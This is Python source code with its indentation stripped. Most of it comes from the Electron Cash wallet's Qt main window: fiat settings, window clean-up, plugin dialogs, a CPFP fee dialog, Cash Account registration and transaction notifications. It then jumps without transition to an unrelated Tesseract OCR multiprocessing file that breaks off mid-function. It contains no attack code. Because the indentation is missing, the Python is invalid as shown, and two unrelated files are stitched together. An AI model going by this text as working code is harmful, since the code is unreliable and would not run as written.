if self.fx and self.fx.is_supported():
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([pgettext('Referencing Fiat currency', 'None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
hist_checkbox.setText(_('Show history rates'))
fiat_address_checkbox.setText(_('Show fiat balance for addresses'))
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency:')), ccy_combo))
fiat_widgets.append((QLabel(_('Source:')), ex_combo))
fiat_widgets.append((hist_checkbox, None))
fiat_widgets.append((fiat_address_checkbox, None))
else:
# For testnet(s) and for --taxcoin we do not support Fiat display
lbl = QLabel(_("Fiat display is not supported on this chain."))
lbl.setAlignment(Qt.AlignHCenter|Qt.AlignVCenter)
f = lbl.font()
f.setItalic(True)
lbl.setFont(f)
fiat_widgets = [(lbl, None)]
tabs_info = [
(gui_widgets, _('General')),
(misc_widgets, pgettext("The preferences -> Fees,misc tab", 'Fees && Misc.')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
try:
# run the dialog
d.exec_()
finally:
dialog_finished = True # paranoia for scan_cameras
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
disconnect_alias_received_signal() # aka self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_message(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice.
# clean_up() guards against that situation.
self.clean_up()
super().closeEvent(event)
event.accept() # paranoia. be sure it's always accepted.
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
del self.cashaddr_toggled_signal # delete alias so it doesn interfere with below
for attr_name in dir(self):
if attr_name.endswith("_signal"):
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
# The below shouldn't even be needed, since Qt should take care of this,
# but Axel Gembe got a crash related to this on Python 3.7.3, PyQt 5.12.3
# so here we are. See #1531
try: self.gui_object.cashaddr_toggled_signal.disconnect(self.update_cashaddr_icon)
except TypeError: pass
try: self.gui_object.cashaddr_toggled_signal.disconnect(self.update_receive_address_widget)
except TypeError: pass
try: self.gui_object.cashaddr_status_button_hidden_signal.disconnect(self.addr_converter_button.setHidden)
except TypeError: pass
try: self.gui_object.update_available_signal.disconnect(self.on_update_available)
except TypeError: pass
try: self.disconnect()
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# Status bar holds references to self, so clear it to help GC this window
self.setStatusBar(None)
# Note that due to quirks on macOS and the shared menu bar, we do *NOT*
# clear the menuBar. Instead, doing this causes the object to get
# deleted and/or its actions (and more importantly menu action hotkeys)
# to go away immediately.
self.setMenuBar(None)
# Disable shortcuts immediately to prevent them from accidentally firing
# on us after we are closed. They will get deleted when this QObject
# is finally deleted by Qt.
for shortcut in self._shortcuts:
shortcut.setEnabled(False)
del shortcut
self._shortcuts.clear()
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget, QAction, TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame, QShortcut)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
if self.cleaned_up:
return
self.cleaned_up = True
if self.wallet.thread: # guard against window close before load_wallet was called (#1554)
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
for w in [self.address_list, self.history_list, self.utxo_list, self.cash_account_e, self.contact_list,
self.tx_update_mgr]:
if w: w.clean_up() # tell relevant object to clean itself up, unregister callbacks, disconnect signals, etc
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server,
# (due to ElectrumX protocol limitations).. but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(parent=self.top_level_window(), title=_('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
plugins.retranslate_internal_plugin_metadata(name)
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stderr)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel(_('{total_size} bytes').format(total_size=total_size)), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
def _pick_address(self, *, title=None, icon=None) -> Address:
''' Returns None on user cancel, or a valid is_mine Address object
from the Address list. '''
from .address_list import AddressList
# Show user address picker
d = WindowModalDialog(self.top_level_window(), title or _('Choose an address'))
d.setObjectName("Window Modal Dialog - " + d.windowTitle())
destroyed_print_error(d) # track object lifecycle
d.setMinimumWidth(self.width()-150)
vbox = QVBoxLayout(d)
if icon:
hbox = QHBoxLayout()
hbox.setContentsMargins(0,0,0,0)
ic_lbl = QLabel()
ic_lbl.setPixmap(icon.pixmap(50))
hbox.addWidget(ic_lbl)
hbox.addItem(QSpacerItem(10, 1))
t_lbl = QLabel("<font size=+1><b>" + (title or '') + "</b></font>")
hbox.addWidget(t_lbl, 0, Qt.AlignLeft)
hbox.addStretch(1)
vbox.addLayout(hbox)
vbox.addWidget(QLabel(_('Choose an address') + ':'))
l = AddressList(self, picker=True)
try:
l.setObjectName("AddressList - " + d.windowTitle())
destroyed_print_error(l) # track object lifecycle
l.update()
vbox.addWidget(l)
ok = OkButton(d)
ok.setDisabled(True)
addr = None
def on_item_changed(current, previous):
nonlocal addr
addr = current and current.data(0, l.DataRoles.address)
ok.setEnabled(addr is not None)
def on_selection_changed():
items = l.selectedItems()
if items: on_item_changed(items[0], None)
else: on_item_changed(None, None)
l.currentItemChanged.connect(on_item_changed)
cancel = CancelButton(d)
vbox.addLayout(Buttons(cancel, ok))
res = d.exec_()
if res == QDialog.Accepted:
return addr
return None
finally:
l.clean_up() # required to unregister network callback
def register_new_cash_account(self, addr = None):
''' Initiates the "Register a new cash account" dialog.
If addr is none, will use self.receive_address.
Alternatively, you may pass the string 'pick' in lieu of an address
if you want this function to present the user with a UI for choosing
an address to register.'''
if addr == 'pick':
addr = self._pick_address(title=_("Register A New Cash Account"), icon=QIcon(":icons/cashacct-logo.png"))
if addr is None:
return # user cancel
addr = addr or self.receive_address or self.wallet.get_receiving_address()
if not addr:
self.print_error("register_new_cash_account: no receive address specified")
return
def on_link(link):
if link == 'ca':
webopen('https://www.cashaccount.info/')
elif link == 'addr':
if self.wallet.is_mine(addr):
self.show_address(addr)
else:
url = web.BE_URL(self.config, 'addr', addr)
if url: webopen(url)
name, placeholder = '', 'Satoshi_Nakamoto'
while True:
lh = self.wallet.get_local_height()
le = ButtonsLineEdit()
help_msg = '<span style="font-weight:400;">' + \
_('<p>How it works: <b>Cash Accounts</b> registrations work by issuing an <b>OP_RETURN</b> transaction to yourself, costing fractions of a penny.</p>'
'<p>The registrations are permanently written to the blockchain and associate a human-friendly name with your address.</p>'
'<p>After the registration transaction receives <i>1 confirmation</i>, you can use your new <b>Cash Account name</b> as if it were an address and give it out to other people (Electron Cash or another Cash Account enabled wallet is required).</p>'
'<p><span style="font-weight:100;">You will be offered the opportunity to review the generated transaction before broadcasting it to the blockchain.</span></p>') + \
'</span>'
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
help_but = HelpButton(help_msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
le.addWidget(help_but)
name = line_dialog(self.top_level_window(),
_("Register A New Cash Account"),
(_("You are registering a new <a href='ca'>Cash Account</a> for your address <a href='addr'><b><pre>{address}</pre></b></a>").format(address=addr.to_ui_string())
+ _("The current block height is <b><i>{block_height}</i></b>, so the new cash account will likely look like: <b><u><i>AccountName<i>#{number}</u></b>.")
.format(block_height=lh or '???', number=max(cashacct.bh2num(lh or 0)+1, 0) or '???')
+ "<br><br><br>" + _("Specify the <b>account name</b> below (limited to 99 characters):") ),
_("Proceed to Send Tab"), default=name, linkActivated=on_link,
placeholder=placeholder, disallow_empty=True,
line_edit_widget = le,
icon=QIcon(":icons/cashacct-logo.png"))
if name is None:
# user cancel
return
name = name.strip()
if not cashacct.name_accept_re.match(name):
self.show_error(_("The specified name cannot be used for a Cash Accounts registration. You must specify 1-99 alphanumeric (ASCII) characters, without spaces (underscores are permitted as well)."))
continue
self._reg_new_cash_account(name, addr)
return
def _reg_new_cash_account(self, name, addr):
self.show_send_tab()
self.do_clear()
# Enabled OP_RETURN stuff even if disabled in prefs. Next do_clear call will reset to prefs presets.
self.message_opreturn_e.setVisible(True)
self.opreturn_rawhex_cb.setVisible(True)
self.opreturn_label.setVisible(True)
# Prevent user from modifying required fields, and hide what we
# can as well.
self.message_opreturn_e.setText(cashacct.ScriptOutput.create_registration(name, addr).script[1:].hex())
self.message_opreturn_e.setFrozen(True)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_rawhex_cb.setDisabled(True)
self.amount_e.setAmount(0)
self.amount_e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setHidden(True)
self.payto_label.setHidden(True)
# Set a default description -- this we allow them to edit
self.message_e.setText(
_("Cash Accounts Registration: '{name}' -> {address}").format(
name=name, address=addr.to_ui_string()
)
)
# set up "Helpful Window" informing user registration will
# not be accepted until at least 1 confirmation.
cashaccounts_never_show_send_tab_hint = self.config.get('cashaccounts_never_show_send_tab_hint', False)
if not cashaccounts_never_show_send_tab_hint:
msg1 = (
_("The Send Tab has been filled-in with your <b>Cash Accounts</b> registration data.")
+ "<br><br>" + _("Please review the transaction, save it, and/or broadcast it at your leisure.")
)
msg2 = ( _("After at least <i>1 confirmation</i>, you will be able to use your new <b>Cash Account</b>, and it will be visible in Electron Cash in the <b>Addresses</b> tab.")
)
msg3 = _("If you wish to control which specific coins are used to "
"fund this registration transaction, feel free to use the "
"Coins and/or Addresses tabs' Spend-from facility.\n\n"
"('Spend from' is a right-click menu option in either tab.)")
res = self.msg_box(
# TODO: get SVG icon..
parent = self, icon=QIcon(":icons/cashacct-logo.png").pixmap(75, 75),
title=_('Register A New Cash Account'), rich_text=True,
text = msg1, informative_text = msg2, detail_text = msg3,
checkbox_text=_("Never show this again"), checkbox_ischecked=False
)
if res[1]:
# never ask checked
self.config.set_key('cashaccounts_never_show_send_tab_hint', True)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.cleaned_up = False
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
self.full_hist_refresh_timer = QTimer(self)
self.full_hist_refresh_timer.setInterval(1000); self.full_hist_refresh_timer.setSingleShot(False)
self.full_hist_refresh_timer.timeout.connect(self.schedule_full_hist_refresh_maybe)
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def clean_up(self):
self.cleaned_up = True
main_window_parent = self.weakParent() # weak -> strong ref
if main_window_parent:
try: main_window_parent.history_updated_signal.disconnect(self.verifs_get_and_clear)
except TypeError: pass
try: main_window_parent.on_timer_signal.disconnect(self.do_check)
except TypeError: pass
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
update_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
t0 = time.time()
parent.history_list.setUpdatesEnabled(False)
had_sorting = parent.history_list.isSortingEnabled()
if had_sorting:
parent.history_list.setSortingEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI in {:0.2f} ms"
.format(n_updates, len(items), (time.time()-t0)*1e3))
if had_sorting:
parent.history_list.setSortingEnabled(True)
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
if parent.history_list.has_unknown_balances:
self.print_error("History tab: 'Unknown' balances detected, will schedule a GUI refresh after wallet settles")
self._full_refresh_ctr = 0
self.full_hist_refresh_timer.start()
_full_refresh_ctr = 0
def schedule_full_hist_refresh_maybe(self):
''' self.full_hist_refresh_timer timeout slot. May schedule a full
history refresh after wallet settles if we have "Unknown" balances. '''
parent = self.weakParent()
if self._full_refresh_ctr > 60:
# Too many retries. Give up.
self.print_error("History tab: Full refresh scheduler timed out.. wallet hasn't settled in 1 minute. Giving up.")
self.full_hist_refresh_timer.stop()
elif parent and parent.history_list.has_unknown_balances:
# Still have 'Unknown' balance. Check if wallet is settled.
if self.need_process_v or not parent.wallet.is_fully_settled_down():
# Wallet not fully settled down yet... schedule this function to run later
self.print_error("History tab: Wallet not yet settled.. will try again in 1 second...")
else:
# Wallet has settled. Schedule an update. Note this function may be called again
# in 1 second to check if the 'Unknown' situation has corrected itself.
self.print_error("History tab: Wallet has settled down, latching need_update to true")
parent.need_update.set()
self._full_refresh_ctr += 1
else:
# No more polling is required. 'Unknown' balance disappeared from
# GUI (or parent window was just closed).
self.full_hist_refresh_timer.stop()
self._full_refresh_ctr = 0
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
txns = self.notifs_get_and_clear()
if txns:
# Combine the transactions
n_ok, n_cashacct, total_amount = 0, 0, 0
last_seen_ca_name = ''
ca_txs = dict() # 'txid' -> ('name', address) -- will be given to contacts_list for "unconfirmed registrations" display
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
for _typ, addr, val in tx.outputs():
# Find Cash Account registrations that are for addresses *in* this wallet
if isinstance(addr, cashacct.ScriptOutput) and parent.wallet.is_mine(addr.address):
n_cashacct += 1
last_seen_ca_name = addr.name
txid = tx.txid_fast()
if txid: ca_txs[txid] = (addr.name, addr.address)
if not is_relevant:
continue
total_amount += v
n_ok += 1
if n_cashacct:
# Unhide the Addresses tab if cash account reg tx seen
# and user never explicitly hid it.
if parent.config.get("show_addresses_tab") is None:
# We unhide it because presumably they want to SEE
# their cash accounts now that they have them --
# and part of the UI is *IN* the Addresses tab.
parent.toggle_tab(parent.addresses_tab)
# Do same for console tab
if parent.config.get("show_contacts_tab") is None:
# We unhide it because presumably they want to SEE
# their cash accounts now that they have them --
# and part of the UI is *IN* the Console tab.
parent.toggle_tab(parent.contacts_tab)
if ca_txs:
# Notify contact_list of potentially unconfirmed txs
parent.contact_list.ca_update_potentially_unconfirmed_registrations(ca_txs)
if parent.wallet.storage.get('gui_notify_tx', True):
ca_text = ''
if n_cashacct > 1:
# plural
ca_text = " + " + _("{number_of_cashaccounts} Cash Accounts registrations").format(number_of_cashaccounts = n_cashacct)
elif n_cashacct == 1:
# singular
ca_text = " + " + _("1 Cash Accounts registration ({cash_accounts_name})").format(cash_accounts_name = last_seen_ca_name)
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(max(n_ok, n_cashacct)))
if max(n_ok, n_cashacct) > 1:
parent.notify(_("{} new transactions: {}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True)) + ca_text)
else:
parent.notify(_("New transaction: {}").format(parent.format_amount_and_units(total_amount, is_diff=True)) + ca_text)
elif n_cashacct:
# No total amount (was just a cashacct reg tx)
ca_text = ca_text[3:] # pop off the " + "
if n_cashacct > 1:
parent.notify(_("{} new transactions: {}")
.format(n_cashacct, ca_text))
else:
parent.notify(_("New transaction: {}").format(ca_text))
# Play the sound effect ('ard moné edition only)
if parent.tx_sound:
parent.tx_sound.play()
|
multiprocess.py | import config
import multiprocessing,cv2,copy
from multiprocessing import Queue
from src.utilities.tesseract.helper import tess_eval,add_lines_to_tess_queue
from src.utilities.tesseract.utils import frequent_height,scale_coords,crop_region,get_tess_text
from src.utilities.tesseract.dynamic_adjustment import coord_adjustment
from anuvaad_auditor.loghandler import log_info
from anuvaad_auditor.loghandler import log_exception
import src.utilities.app_context as app_context
tessract_queue = Queue()
file_writer_queue = Queue()
def start_tess_eval(workers= config.BATCH_SIZE):
process = []
for w in range(workers):
process.append(multiprocessing.Process(target=tesseract_eval))
process[-1].start()
def tesseract_eval():
while True:
try:
line_data = tessract_queue.get(block=True)
if len(line_data)>0:
line_stats,rgn_idx,line_idx= tess_eval(line_data)
file_writer_queue.put([line_stats,rgn_idx,line_idx])
else:
file_writer_queue.put([])
except Exception as e:
file_writer_queue.put([])
log_exception("Error in tesseract multiprocesing ", app_context.application_context, e)
start_tess_eval()
def get_queue_words():
page_words=[]
while file_writer_queue.qsize()>0:
line_info = file_writer_queue.get()
if len(line_info)>0:
page_words.append(line_info)
return page_words
def collate_words(page_regions,page_words):
for word_idx,word_info in enumerate(page_words):
word,rgn_idx,line_idx = word_info
page_regions[rgn_idx]['regions'][line_idx]['regions'] = copy.deepcopy(word)
return page_regions
def get_mode_height(page_regions):
page_lines=[]
if len(page_regions)>0:
for rgn_idx, region in enumerate(page_regions):
